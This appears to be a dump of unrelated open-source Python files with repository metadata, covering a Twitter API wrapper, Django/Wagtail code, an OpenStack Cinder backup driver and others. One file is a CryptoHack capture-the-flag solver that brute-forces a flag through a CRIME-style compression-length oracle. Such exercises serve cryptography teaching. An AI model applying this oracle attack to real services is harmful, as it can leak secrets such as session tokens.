# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library that provides a Python interface to the Twitter API."""
from __future__ import absolute_import
__author__ = 'The Python-Twitter Developers'
__email__ = 'python-twitter@googlegroups.com'
__copyright__ = 'Copyright (c) 2007-2016 The Python-Twitter Developers'
__license__ = 'Apache License 2.0'
__version__ = '3.5'
__url__ = 'https://github.com/bear/python-twitter'
__download_url__ = 'https://pypi.python.org/pypi/python-twitter'
__description__ = 'A Python wrapper around the Twitter API'
import json # noqa
try:
from hashlib import md5 # noqa
except ImportError:
from md5 import md5 # noqa
from ._file_cache import _FileCache # noqa
from .error import TwitterError # noqa
from .parse_tweet import ParseTweet # noqa
from .models import ( # noqa
Category, # noqa
DirectMessage, # noqa
Hashtag, # noqa
List, # noqa
Media, # noqa
Place, # noga
Trend, # noqa
Url, # noqa
User, # noqa
UserStatus, # noqa
Status # noqa
)
from .api import Api # noqa
| 38.385965 | 74 | 0.552559 |
79546f367c679fe0a212c9561942dcaa6fab1f35 | 852 | py | Python | home/migrations/0019_auto_20210204_1139.py | rachelhs/wagtail-starter | 2363517fd91e279d564ff899dfa3cdfd7ec01aa9 | [
"MIT"
] | null | null | null | home/migrations/0019_auto_20210204_1139.py | rachelhs/wagtail-starter | 2363517fd91e279d564ff899dfa3cdfd7ec01aa9 | [
"MIT"
] | null | null | null | home/migrations/0019_auto_20210204_1139.py | rachelhs/wagtail-starter | 2363517fd91e279d564ff899dfa3cdfd7ec01aa9 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-02-04 11:39
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtailstreamforms.blocks
class Migration(migrations.Migration):
dependencies = [
('home', '0018_auto_20210204_1138'),
]
operations = [
migrations.AlterField(
model_name='homepage',
name='contact_body',
field=wagtail.core.fields.StreamField([('form', wagtail.core.blocks.StructBlock([('form', wagtailstreamforms.blocks.FormChooserBlock()), ('form_action', wagtail.core.blocks.CharBlock(help_text='The form post action. "" or "." for the current page or a url', required=False)), ('form_reference', wagtailstreamforms.blocks.InfoBlock(help_text='This form will be given a unique reference once saved', required=False))]))]),
),
]
| 38.727273 | 432 | 0.700704 |
79546f779a2b4576ff5738ea5ceda70c191bd67c | 390 | py | Python | flags/middleware.py | mdunc/django-flags | 7fdb7a67da25df197f53df4bfa06c8e5175944a3 | [
"CC0-1.0"
] | 142 | 2018-07-27T15:38:13.000Z | 2022-03-19T19:09:44.000Z | flags/middleware.py | mdunc/django-flags | 7fdb7a67da25df197f53df4bfa06c8e5175944a3 | [
"CC0-1.0"
] | 64 | 2018-06-25T14:21:35.000Z | 2022-03-14T17:42:18.000Z | flags/middleware.py | mdunc/django-flags | 7fdb7a67da25df197f53df4bfa06c8e5175944a3 | [
"CC0-1.0"
] | 24 | 2018-10-09T20:05:36.000Z | 2022-03-29T16:34:30.000Z | import warnings
from django.core.exceptions import MiddlewareNotUsed
class FlagConditionsMiddleware:
def __init__(self, get_response):
warnings.warn(
"FlagConditionsMiddleware is deprecated and no longer has any "
"effect. It will be removed in a future version of Django-Flags. ",
FutureWarning,
)
raise MiddlewareNotUsed
| 27.857143 | 79 | 0.684615 |
795470524ee045bfe3de358d7ed1a49b8dacdcfa | 1,020 | py | Python | cryptohack/ctrime/ctrime.py | onealmond/hacking-lab | 631e615944add02db3c2afef47bf1de7171eb065 | [
"MIT"
] | 9 | 2021-04-20T15:28:36.000Z | 2022-03-08T19:53:48.000Z | cryptohack/ctrime/ctrime.py | onealmond/hacking-lab | 631e615944add02db3c2afef47bf1de7171eb065 | [
"MIT"
] | null | null | null | cryptohack/ctrime/ctrime.py | onealmond/hacking-lab | 631e615944add02db3c2afef47bf1de7171eb065 | [
"MIT"
] | 6 | 2021-06-24T03:25:21.000Z | 2022-02-20T21:44:52.000Z | #!/usr/bin/env python3
import time
import requests
import string
def print_blk(hex_blks, sz):
for i in range(0, len(hex_blks), sz):
print(hex_blks[i:i+sz], ' ', end='')
print()
def encrypt(plain):
url = 'http://aes.cryptohack.org/ctrime/encrypt/'
rsp = requests.get(url + plain + '/')
return rsp.json()['ciphertext']
alphabet = '}'+'!'+'_'+'@'+'?'+string.ascii_uppercase+string.digits+string.ascii_lowercase
def bruteforce():
flag = b'crypto{'
cipher = encrypt(flag.hex())
mi = len(cipher)
while True:
for c in alphabet:
cipher = encrypt((flag+c.encode()).hex())
print(c, len(cipher))
if mi == len(cipher):
flag += c.encode()
mi = len(cipher)
print(mi, flag)
break
if c == alphabet[-1]:
mi += 2
break
time.sleep(1)
if flag.endswith(b'}'):
print(flag)
break
bruteforce()
| 23.72093 | 90 | 0.512745 |
7954705ffaab5c71c11f77875ee00d15f66974ea | 36,632 | py | Python | cinder/backup/chunkeddriver.py | scottwedge/openstack-cinder | 08e90b0d89d6f7e84cb774f82d0886dde131ce98 | [
"Apache-2.0"
] | null | null | null | cinder/backup/chunkeddriver.py | scottwedge/openstack-cinder | 08e90b0d89d6f7e84cb774f82d0886dde131ce98 | [
"Apache-2.0"
] | null | null | null | cinder/backup/chunkeddriver.py | scottwedge/openstack-cinder | 08e90b0d89d6f7e84cb774f82d0886dde131ce98 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2014 TrilioData, Inc
# Copyright (c) 2015 EMC Corporation
# Copyright (C) 2015 Kevin Fox <kevin@efox.cc>
# Copyright (C) 2015 Tom Barron <tpb@dyncloud.net>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic base class to implement metadata, compression and chunked data
operations
"""
import abc
import hashlib
import json
import os
import sys
import eventlet
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder.backup import driver
from cinder import exception
from cinder.i18n import _
from cinder import objects
from cinder.objects import fields
from cinder.volume import utils as volume_utils
if sys.platform == 'win32':
from os_win import utilsfactory as os_win_utilsfactory
LOG = logging.getLogger(__name__)
backup_opts = [
cfg.StrOpt('backup_compression_algorithm',
default='zlib',
ignore_case=True,
choices=['none', 'off', 'no',
'zlib', 'gzip',
'bz2', 'bzip2'],
help='Compression algorithm (None to disable)'),
]
CONF = cfg.CONF
CONF.register_opts(backup_opts)
# Object writer and reader returned by inheriting classes must not have any
# logging calls, as well as the compression libraries, as eventlet has a bug
# (https://github.com/eventlet/eventlet/issues/432) that would result in
# failures.
@six.add_metaclass(abc.ABCMeta)
class ChunkedBackupDriver(driver.BackupDriver):
"""Abstract chunked backup driver.
Implements common functionality for backup drivers that store volume
data in multiple "chunks" in a backup repository when the size of
the backed up cinder volume exceeds the size of a backup repository
"chunk."
Provides abstract methods to be implemented in concrete chunking
drivers.
"""
DRIVER_VERSION = '1.0.0'
DRIVER_VERSION_MAPPING = {'1.0.0': '_restore_v1'}
def _get_compressor(self, algorithm):
try:
if algorithm.lower() in ('none', 'off', 'no'):
return None
if algorithm.lower() in ('zlib', 'gzip'):
import zlib as compressor
result = compressor
elif algorithm.lower() in ('bz2', 'bzip2'):
import bz2 as compressor
result = compressor
else:
result = None
if result:
# NOTE(geguileo): Compression/Decompression starves
# greenthreads so we use a native thread instead.
return eventlet.tpool.Proxy(result)
except ImportError:
pass
err = _('unsupported compression algorithm: %s') % algorithm
raise ValueError(err)
def __init__(self, context, chunk_size_bytes, sha_block_size_bytes,
backup_default_container, enable_progress_timer,
db=None):
super(ChunkedBackupDriver, self).__init__(context, db)
self.chunk_size_bytes = chunk_size_bytes
self.sha_block_size_bytes = sha_block_size_bytes
self.backup_default_container = backup_default_container
self.enable_progress_timer = enable_progress_timer
self.backup_timer_interval = CONF.backup_timer_interval
self.data_block_num = CONF.backup_object_number_per_notification
self.az = CONF.storage_availability_zone
self.backup_compression_algorithm = CONF.backup_compression_algorithm
self.compressor = \
self._get_compressor(CONF.backup_compression_algorithm)
self.support_force_delete = True
if sys.platform == 'win32' and self.chunk_size_bytes % 4096:
# The chunk size must be a multiple of the sector size. In order
# to fail out early and avoid attaching the disks, we'll just
# enforce the chunk size to be a multiple of 4096.
err = _("Invalid chunk size. It must be a multiple of 4096.")
raise exception.InvalidConfigurationValue(message=err)
def _get_object_writer(self, container, object_name, extra_metadata=None):
"""Return writer proxy-wrapped to execute methods in native thread."""
writer = self.get_object_writer(container, object_name, extra_metadata)
return eventlet.tpool.Proxy(writer)
def _get_object_reader(self, container, object_name, extra_metadata=None):
"""Return reader proxy-wrapped to execute methods in native thread."""
reader = self.get_object_reader(container, object_name, extra_metadata)
return eventlet.tpool.Proxy(reader)
# To create your own "chunked" backup driver, implement the following
# abstract methods.
@abc.abstractmethod
def put_container(self, container):
"""Create the container if needed. No failure if it pre-exists."""
return
@abc.abstractmethod
def get_container_entries(self, container, prefix):
"""Get container entry names."""
return
@abc.abstractmethod
def get_object_writer(self, container, object_name, extra_metadata=None):
"""Returns a writer object which stores the chunk data in backup repository.
The object returned should be a context handler that can be used in a
"with" context.
The object writer methods must not have any logging calls, as eventlet
has a bug (https://github.com/eventlet/eventlet/issues/432) that would
result in failures.
"""
return
@abc.abstractmethod
def get_object_reader(self, container, object_name, extra_metadata=None):
"""Returns a reader object for the backed up chunk.
The object reader methods must not have any logging calls, as eventlet
has a bug (https://github.com/eventlet/eventlet/issues/432) that would
result in failures.
"""
return
@abc.abstractmethod
def delete_object(self, container, object_name):
"""Delete object from container."""
return
@abc.abstractmethod
def _generate_object_name_prefix(self, backup):
return
@abc.abstractmethod
def update_container_name(self, backup, container):
"""Allow sub-classes to override container name.
This method exists so that sub-classes can override the container name
as it comes in to the driver in the backup object. Implementations
should return None if no change to the container name is desired.
"""
return
@abc.abstractmethod
def get_extra_metadata(self, backup, volume):
"""Return extra metadata to use in prepare_backup.
This method allows for collection of extra metadata in prepare_backup()
which will be passed to get_object_reader() and get_object_writer().
Subclass extensions can use this extra information to optimize
data transfers. Return a json serializable object.
"""
return
def _create_container(self, backup):
# Container's name will be decided by the driver (returned by method
# update_container_name), if no change is required by the driver then
# we'll use the one the backup object already has, but if it doesn't
# have one backup_default_container will be used.
new_container = self.update_container_name(backup, backup.container)
if new_container:
# If the driver is not really changing the name we don't want to
# dirty the field in the object and save it to the DB with the same
# value.
if new_container != backup.container:
backup.container = new_container
elif backup.container is None:
backup.container = self.backup_default_container
LOG.debug('_create_container started, container: %(container)s,'
'backup: %(backup_id)s.',
{'container': backup.container, 'backup_id': backup.id})
backup.save()
self.put_container(backup.container)
return backup.container
def _generate_object_names(self, backup):
prefix = backup['service_metadata']
object_names = self.get_container_entries(backup['container'], prefix)
LOG.debug('generated object list: %s.', object_names)
return object_names
def _metadata_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_metadata' % object_name
return filename
def _sha256_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_sha256file' % object_name
return filename
def _write_metadata(self, backup, volume_id, container, object_list,
volume_meta, extra_metadata=None):
filename = self._metadata_filename(backup)
LOG.debug('_write_metadata started, container name: %(container)s,'
' metadata filename: %(filename)s.',
{'container': container, 'filename': filename})
metadata = {}
metadata['version'] = self.DRIVER_VERSION
metadata['backup_id'] = backup['id']
metadata['volume_id'] = volume_id
metadata['backup_name'] = backup['display_name']
metadata['backup_description'] = backup['display_description']
metadata['created_at'] = str(backup['created_at'])
metadata['objects'] = object_list
metadata['parent_id'] = backup['parent_id']
metadata['volume_meta'] = volume_meta
if extra_metadata:
metadata['extra_metadata'] = extra_metadata
metadata_json = json.dumps(metadata, sort_keys=True, indent=2)
if six.PY3:
metadata_json = metadata_json.encode('utf-8')
with self._get_object_writer(container, filename) as writer:
writer.write(metadata_json)
LOG.debug('_write_metadata finished. Metadata: %s.', metadata_json)
def _write_sha256file(self, backup, volume_id, container, sha256_list):
filename = self._sha256_filename(backup)
LOG.debug('_write_sha256file started, container name: %(container)s,'
' sha256file filename: %(filename)s.',
{'container': container, 'filename': filename})
sha256file = {}
sha256file['version'] = self.DRIVER_VERSION
sha256file['backup_id'] = backup['id']
sha256file['volume_id'] = volume_id
sha256file['backup_name'] = backup['display_name']
sha256file['backup_description'] = backup['display_description']
sha256file['created_at'] = six.text_type(backup['created_at'])
sha256file['chunk_size'] = self.sha_block_size_bytes
sha256file['sha256s'] = sha256_list
sha256file_json = json.dumps(sha256file, sort_keys=True, indent=2)
if six.PY3:
sha256file_json = sha256file_json.encode('utf-8')
with self._get_object_writer(container, filename) as writer:
writer.write(sha256file_json)
LOG.debug('_write_sha256file finished.')
def _read_metadata(self, backup):
container = backup['container']
filename = self._metadata_filename(backup)
LOG.debug('_read_metadata started, container name: %(container)s, '
'metadata filename: %(filename)s.',
{'container': container, 'filename': filename})
with self._get_object_reader(container, filename) as reader:
metadata_json = reader.read()
if six.PY3:
metadata_json = metadata_json.decode('utf-8')
metadata = json.loads(metadata_json)
LOG.debug('_read_metadata finished. Metadata: %s.', metadata_json)
return metadata
def _read_sha256file(self, backup):
container = backup['container']
filename = self._sha256_filename(backup)
LOG.debug('_read_sha256file started, container name: %(container)s, '
'sha256 filename: %(filename)s.',
{'container': container, 'filename': filename})
with self._get_object_reader(container, filename) as reader:
sha256file_json = reader.read()
if six.PY3:
sha256file_json = sha256file_json.decode('utf-8')
sha256file = json.loads(sha256file_json)
LOG.debug('_read_sha256file finished.')
return sha256file
def _prepare_backup(self, backup):
"""Prepare the backup process and return the backup metadata."""
volume = self.db.volume_get(self.context, backup.volume_id)
if volume['size'] <= 0:
err = _('volume size %d is invalid.') % volume['size']
raise exception.InvalidVolume(reason=err)
container = self._create_container(backup)
object_prefix = self._generate_object_name_prefix(backup)
backup.service_metadata = object_prefix
backup.save()
volume_size_bytes = volume['size'] * units.Gi
availability_zone = self.az
LOG.debug('starting backup of volume: %(volume_id)s,'
' volume size: %(volume_size_bytes)d, object names'
' prefix %(object_prefix)s, availability zone:'
' %(availability_zone)s',
{
'volume_id': backup.volume_id,
'volume_size_bytes': volume_size_bytes,
'object_prefix': object_prefix,
'availability_zone': availability_zone,
})
object_meta = {'id': 1, 'list': [], 'prefix': object_prefix,
'volume_meta': None}
object_sha256 = {'id': 1, 'sha256s': [], 'prefix': object_prefix}
extra_metadata = self.get_extra_metadata(backup, volume)
if extra_metadata is not None:
object_meta['extra_metadata'] = extra_metadata
return (object_meta, object_sha256, extra_metadata, container,
volume_size_bytes)
def _backup_chunk(self, backup, container, data, data_offset,
object_meta, extra_metadata):
"""Backup data chunk based on the object metadata and offset."""
object_prefix = object_meta['prefix']
object_list = object_meta['list']
object_id = object_meta['id']
object_name = '%s-%05d' % (object_prefix, object_id)
obj = {}
obj[object_name] = {}
obj[object_name]['offset'] = data_offset
obj[object_name]['length'] = len(data)
LOG.debug('Backing up chunk of data from volume.')
algorithm, output_data = self._prepare_output_data(data)
obj[object_name]['compression'] = algorithm
LOG.debug('About to put_object')
with self._get_object_writer(
container, object_name, extra_metadata=extra_metadata
) as writer:
writer.write(output_data)
md5 = eventlet.tpool.execute(hashlib.md5, data).hexdigest()
obj[object_name]['md5'] = md5
LOG.debug('backup MD5 for %(object_name)s: %(md5)s',
{'object_name': object_name, 'md5': md5})
object_list.append(obj)
object_id += 1
object_meta['list'] = object_list
object_meta['id'] = object_id
LOG.debug('Calling eventlet.sleep(0)')
eventlet.sleep(0)
def _prepare_output_data(self, data):
if self.compressor is None:
return 'none', data
data_size_bytes = len(data)
# Execute compression in native thread so it doesn't prevent
# cooperative greenthread switching.
compressed_data = self.compressor.compress(data)
comp_size_bytes = len(compressed_data)
algorithm = CONF.backup_compression_algorithm.lower()
if comp_size_bytes >= data_size_bytes:
LOG.debug('Compression of this chunk was ineffective: '
'original length: %(data_size_bytes)d, '
'compressed length: %(compressed_size_bytes)d. '
'Using original data for this chunk.',
{'data_size_bytes': data_size_bytes,
'compressed_size_bytes': comp_size_bytes,
})
return 'none', data
LOG.debug('Compressed %(data_size_bytes)d bytes of data '
'to %(comp_size_bytes)d bytes using %(algorithm)s.',
{'data_size_bytes': data_size_bytes,
'comp_size_bytes': comp_size_bytes,
'algorithm': algorithm,
})
return algorithm, compressed_data
def _finalize_backup(self, backup, container, object_meta, object_sha256):
"""Write the backup's metadata to the backup repository."""
object_list = object_meta['list']
object_id = object_meta['id']
volume_meta = object_meta['volume_meta']
sha256_list = object_sha256['sha256s']
extra_metadata = object_meta.get('extra_metadata')
self._write_sha256file(backup,
backup.volume_id,
container,
sha256_list)
self._write_metadata(backup,
backup.volume_id,
container,
object_list,
volume_meta,
extra_metadata)
# NOTE(whoami-rajat) : The object_id variable is used to name
# the backup objects and hence differs from the object_count
# variable, therefore the increment of object_id value in the last
# iteration of _backup_chunk() method shouldn't be reflected in the
# object_count variable.
backup.object_count = object_id - 1
backup.save()
LOG.debug('backup %s finished.', backup['id'])
def _backup_metadata(self, backup, object_meta):
"""Backup volume metadata.
NOTE(dosaboy): the metadata we are backing up is obtained from a
versioned api so we should not alter it in any way here.
We must also be sure that the service that will perform
the restore is compatible with version used.
"""
json_meta = self.get_metadata(backup['volume_id'])
if not json_meta:
LOG.debug("No volume metadata to backup.")
return
object_meta["volume_meta"] = json_meta
def _send_progress_end(self, context, backup, object_meta):
object_meta['backup_percent'] = 100
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
extra_usage_info=
object_meta)
def _send_progress_notification(self, context, backup, object_meta,
total_block_sent_num, total_volume_size):
backup_percent = total_block_sent_num * 100 / total_volume_size
object_meta['backup_percent'] = backup_percent
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
extra_usage_info=
object_meta)
def _get_win32_phys_disk_size(self, disk_path):
win32_diskutils = os_win_utilsfactory.get_diskutils()
disk_number = win32_diskutils.get_device_number_from_device_name(
disk_path)
return win32_diskutils.get_disk_size(disk_number)
def _calculate_sha(self, data):
"""Calculate SHA256 of a data chunk.
This method cannot log anything as it is called on a native thread.
"""
# NOTE(geguileo): Using memoryview to avoid data copying when slicing
# for the sha256 call.
chunk = memoryview(data)
shalist = []
off = 0
datalen = len(chunk)
while off < datalen:
chunk_end = min(datalen, off + self.sha_block_size_bytes)
block = chunk[off:chunk_end]
sha = hashlib.sha256(block).hexdigest()
shalist.append(sha)
off += self.sha_block_size_bytes
return shalist
def backup(self, backup, volume_file, backup_metadata=True):
"""Backup the given volume.
If backup['parent_id'] is given, then an incremental backup
is performed.
"""
if self.chunk_size_bytes % self.sha_block_size_bytes:
err = _('Chunk size is not multiple of '
'block size for creating hash.')
raise exception.InvalidBackup(reason=err)
# Read the shafile of the parent backup if backup['parent_id']
# is given.
parent_backup_shafile = None
parent_backup = None
if backup.parent_id:
parent_backup = objects.Backup.get_by_id(self.context,
backup.parent_id)
parent_backup_shafile = self._read_sha256file(parent_backup)
parent_backup_shalist = parent_backup_shafile['sha256s']
if (parent_backup_shafile['chunk_size'] !=
self.sha_block_size_bytes):
err = (_('Hash block size has changed since the last '
'backup. New hash block size: %(new)s. Old hash '
'block size: %(old)s. Do a full backup.')
% {'old': parent_backup_shafile['chunk_size'],
'new': self.sha_block_size_bytes})
raise exception.InvalidBackup(reason=err)
# If the volume size increased since the last backup, fail
# the incremental backup and ask user to do a full backup.
if backup.size > parent_backup.size:
err = _('Volume size increased since the last '
'backup. Do a full backup.')
raise exception.InvalidBackup(reason=err)
if sys.platform == 'win32':
# When dealing with Windows physical disks, we need the exact
# size of the disk. Attempting to read passed this boundary will
# lead to an IOError exception. At the same time, we cannot
# seek to the end of file.
win32_disk_size = self._get_win32_phys_disk_size(volume_file.name)
(object_meta, object_sha256, extra_metadata, container,
volume_size_bytes) = self._prepare_backup(backup)
counter = 0
total_block_sent_num = 0
# There are two mechanisms to send the progress notification.
# 1. The notifications are periodically sent in a certain interval.
# 2. The notifications are sent after a certain number of chunks.
# Both of them are working simultaneously during the volume backup,
# when "chunked" backup drivers are deployed.
def _notify_progress():
self._send_progress_notification(self.context, backup,
object_meta,
total_block_sent_num,
volume_size_bytes)
timer = loopingcall.FixedIntervalLoopingCall(
_notify_progress)
if self.enable_progress_timer:
timer.start(interval=self.backup_timer_interval)
sha256_list = object_sha256['sha256s']
shaindex = 0
is_backup_canceled = False
while True:
# First of all, we check the status of this backup. If it
# has been changed to delete or has been deleted, we cancel the
# backup process to do forcing delete.
with backup.as_read_deleted():
backup.refresh()
if backup.status in (fields.BackupStatus.DELETING,
fields.BackupStatus.DELETED):
is_backup_canceled = True
# To avoid the chunk left when deletion complete, need to
# clean up the object of chunk again.
self.delete_backup(backup)
LOG.debug('Cancel the backup process of %s.', backup.id)
break
data_offset = volume_file.tell()
if sys.platform == 'win32':
read_bytes = min(self.chunk_size_bytes,
win32_disk_size - data_offset)
else:
read_bytes = self.chunk_size_bytes
data = volume_file.read(read_bytes)
if data == b'':
break
# Calculate new shas with the datablock.
shalist = eventlet.tpool.execute(self._calculate_sha, data)
sha256_list.extend(shalist)
# If parent_backup is not None, that means an incremental
# backup will be performed.
if parent_backup:
# Find the extent that needs to be backed up.
extent_off = -1
for idx, sha in enumerate(shalist):
if sha != parent_backup_shalist[shaindex]:
if extent_off == -1:
# Start of new extent.
extent_off = idx * self.sha_block_size_bytes
else:
if extent_off != -1:
# We've reached the end of extent.
extent_end = idx * self.sha_block_size_bytes
segment = data[extent_off:extent_end]
self._backup_chunk(backup, container, segment,
data_offset + extent_off,
object_meta,
extra_metadata)
extent_off = -1
shaindex += 1
# The last extent extends to the end of data buffer.
if extent_off != -1:
extent_end = len(data)
segment = data[extent_off:extent_end]
self._backup_chunk(backup, container, segment,
data_offset + extent_off,
object_meta, extra_metadata)
extent_off = -1
else: # Do a full backup.
self._backup_chunk(backup, container, data, data_offset,
object_meta, extra_metadata)
# Notifications
total_block_sent_num += self.data_block_num
counter += 1
if counter == self.data_block_num:
# Send the notification to Ceilometer when the chunk
# number reaches the data_block_num. The backup percentage
# is put in the metadata as the extra information.
self._send_progress_notification(self.context, backup,
object_meta,
total_block_sent_num,
volume_size_bytes)
# Reset the counter
counter = 0
# Stop the timer.
timer.stop()
# If backup has been cancelled we have nothing more to do
# but timer.stop().
if is_backup_canceled:
return
# All the data have been sent, the backup_percent reaches 100.
self._send_progress_end(self.context, backup, object_meta)
object_sha256['sha256s'] = sha256_list
if backup_metadata:
try:
self._backup_metadata(backup, object_meta)
# Whatever goes wrong, we want to log, cleanup, and re-raise.
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception("Backup volume metadata failed.")
self.delete_backup(backup)
self._finalize_backup(backup, container, object_meta, object_sha256)
def _restore_v1(self, backup, volume_id, metadata, volume_file,
requested_backup):
"""Restore a v1 volume backup.
Raises BackupRestoreCancel on any requested_backup status change, we
ignore the backup parameter for this check since that's only the
current data source from the list of backup sources.
"""
backup_id = backup['id']
LOG.debug('v1 volume backup restore of %s started.', backup_id)
extra_metadata = metadata.get('extra_metadata')
container = backup['container']
metadata_objects = metadata['objects']
metadata_object_names = []
for obj in metadata_objects:
metadata_object_names.extend(obj.keys())
LOG.debug('metadata_object_names = %s.', metadata_object_names)
prune_list = [self._metadata_filename(backup),
self._sha256_filename(backup)]
object_names = [object_name for object_name in
self._generate_object_names(backup)
if object_name not in prune_list]
if sorted(object_names) != sorted(metadata_object_names):
err = _('restore_backup aborted, actual object list '
'does not match object list stored in metadata.')
raise exception.InvalidBackup(reason=err)
for metadata_object in metadata_objects:
# Abort when status changes to error, available, or anything else
with requested_backup.as_read_deleted():
requested_backup.refresh()
if requested_backup.status != fields.BackupStatus.RESTORING:
raise exception.BackupRestoreCancel(back_id=backup.id,
vol_id=volume_id)
object_name, obj = list(metadata_object.items())[0]
LOG.debug('restoring object. backup: %(backup_id)s, '
'container: %(container)s, object name: '
'%(object_name)s, volume: %(volume_id)s.',
{
'backup_id': backup_id,
'container': container,
'object_name': object_name,
'volume_id': volume_id,
})
with self._get_object_reader(
container, object_name,
extra_metadata=extra_metadata) as reader:
body = reader.read()
compression_algorithm = metadata_object[object_name]['compression']
decompressor = self._get_compressor(compression_algorithm)
volume_file.seek(obj['offset'])
if decompressor is not None:
LOG.debug('decompressing data using %s algorithm',
compression_algorithm)
decompressed = decompressor.decompress(body)
volume_file.write(decompressed)
else:
volume_file.write(body)
# force flush every write to avoid long blocking write on close
volume_file.flush()
# Be tolerant to IO implementations that do not support fileno()
try:
fileno = volume_file.fileno()
except IOError:
LOG.info("volume_file does not support fileno() so skipping "
"fsync()")
else:
os.fsync(fileno)
# Restoring a backup to a volume can take some time. Yield so other
# threads can run, allowing for among other things the service
# status to be updated
eventlet.sleep(0)
LOG.debug('v1 volume backup restore of %s finished.',
backup_id)
def restore(self, backup, volume_id, volume_file):
"""Restore the given volume backup from backup repository.
Raises BackupRestoreCancel on any backup status change.
"""
backup_id = backup['id']
container = backup['container']
object_prefix = backup['service_metadata']
LOG.debug('starting restore of backup %(object_prefix)s '
'container: %(container)s, to volume %(volume_id)s, '
'backup: %(backup_id)s.',
{
'object_prefix': object_prefix,
'container': container,
'volume_id': volume_id,
'backup_id': backup_id,
})
metadata = self._read_metadata(backup)
metadata_version = metadata['version']
LOG.debug('Restoring backup version %s', metadata_version)
try:
restore_func = getattr(self, self.DRIVER_VERSION_MAPPING.get(
metadata_version))
except TypeError:
err = (_('No support to restore backup version %s')
% metadata_version)
raise exception.InvalidBackup(reason=err)
# Build a list of backups based on parent_id. A full backup
# will be the last one in the list.
backup_list = []
backup_list.append(backup)
current_backup = backup
while current_backup.parent_id:
prev_backup = objects.Backup.get_by_id(self.context,
current_backup.parent_id)
backup_list.append(prev_backup)
current_backup = prev_backup
# Do a full restore first, then layer the incremental backups
# on top of it in order.
index = len(backup_list) - 1
while index >= 0:
backup1 = backup_list[index]
index = index - 1
metadata = self._read_metadata(backup1)
restore_func(backup1, volume_id, metadata, volume_file, backup)
volume_meta = metadata.get('volume_meta', None)
try:
if volume_meta:
self.put_metadata(volume_id, volume_meta)
else:
LOG.debug("No volume metadata in this backup.")
except exception.BackupMetadataUnsupportedVersion:
msg = _("Metadata restore failed due to incompatible version.")
LOG.error(msg)
raise exception.BackupOperationError(msg)
LOG.debug('restore %(backup_id)s to %(volume_id)s finished.',
{'backup_id': backup_id, 'volume_id': volume_id})
def delete_backup(self, backup):
"""Delete the given backup."""
container = backup['container']
object_prefix = backup['service_metadata']
LOG.debug('delete started, backup: %(id)s, container: %(cont)s, '
'prefix: %(pre)s.',
{'id': backup['id'],
'cont': container,
'pre': object_prefix})
if container is not None and object_prefix is not None:
object_names = []
try:
object_names = self._generate_object_names(backup)
except Exception:
LOG.warning('Error while listing objects, continuing'
' with delete.')
for object_name in object_names:
self.delete_object(container, object_name)
LOG.debug('deleted object: %(object_name)s'
' in container: %(container)s.',
{
'object_name': object_name,
'container': container
})
# Deleting a backup's objects can take some time.
# Yield so other threads can run
eventlet.sleep(0)
LOG.debug('delete %s finished.', backup['id'])
| 43.818182 | 84 | 0.593716 |
795470d88933e314b3e2fdf8dd3957ab05b3d47e | 123 | py | Python | seleniumwire/__init__.py | acidbotmaker/selenium-wire | 969fca764191a60794780146a5be45d78032bc0d | [
"MIT"
] | null | null | null | seleniumwire/__init__.py | acidbotmaker/selenium-wire | 969fca764191a60794780146a5be45d78032bc0d | [
"MIT"
] | null | null | null | seleniumwire/__init__.py | acidbotmaker/selenium-wire | 969fca764191a60794780146a5be45d78032bc0d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Top-level package for Selenium Wire."""
__author__ = """Will Keeling"""
__version__ = '2.1.2'
| 17.571429 | 42 | 0.609756 |
7954715a234b9701569edd77908231e729826b2b | 575 | py | Python | accounts/signals.py | Panda4817/MySousChef | 64c3967566b3834d578406884ee6b4a3807b21f8 | [
"MIT"
] | 1 | 2021-02-25T17:54:28.000Z | 2021-02-25T17:54:28.000Z | recipes/signals.py | Panda4817/MySousChef | 64c3967566b3834d578406884ee6b4a3807b21f8 | [
"MIT"
] | null | null | null | recipes/signals.py | Panda4817/MySousChef | 64c3967566b3834d578406884ee6b4a3807b21f8 | [
"MIT"
] | null | null | null | from django.contrib.auth.signals import user_logged_out, user_logged_in
from django.contrib import messages
# Custom signal and message for when user signs out
def show_logout_message(sender, user, request, **kwargs):
messages.info(request, 'You have been logged out', fail_silently=True)
# Custom signal and message for when user signs in
def show_login_message(sender, user, request, **kwargs):
messages.info(request, 'You are logged in', fail_silently=True)
user_logged_out.connect(show_logout_message)
user_logged_in.connect(show_login_message) | 38.333333 | 75 | 0.782609 |
79547187bd59b5a2ba14e2426bff9da2e3252285 | 8,405 | py | Python | bin/add_revision.py | tdopierre/acl-anthology | 8eed8a3fb0afa68ff2b6580626ee7c66de29694e | [
"Apache-2.0"
] | 221 | 2017-06-05T04:44:41.000Z | 2022-02-11T20:23:31.000Z | bin/add_revision.py | tdopierre/acl-anthology | 8eed8a3fb0afa68ff2b6580626ee7c66de29694e | [
"Apache-2.0"
] | 1,498 | 2017-08-09T13:41:49.000Z | 2022-03-31T02:56:58.000Z | bin/add_revision.py | tdopierre/acl-anthology | 8eed8a3fb0afa68ff2b6580626ee7c66de29694e | [
"Apache-2.0"
] | 183 | 2017-10-28T00:56:49.000Z | 2022-03-14T14:55:00.000Z | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2019 Matt Post <post@cs.jhu.edu>
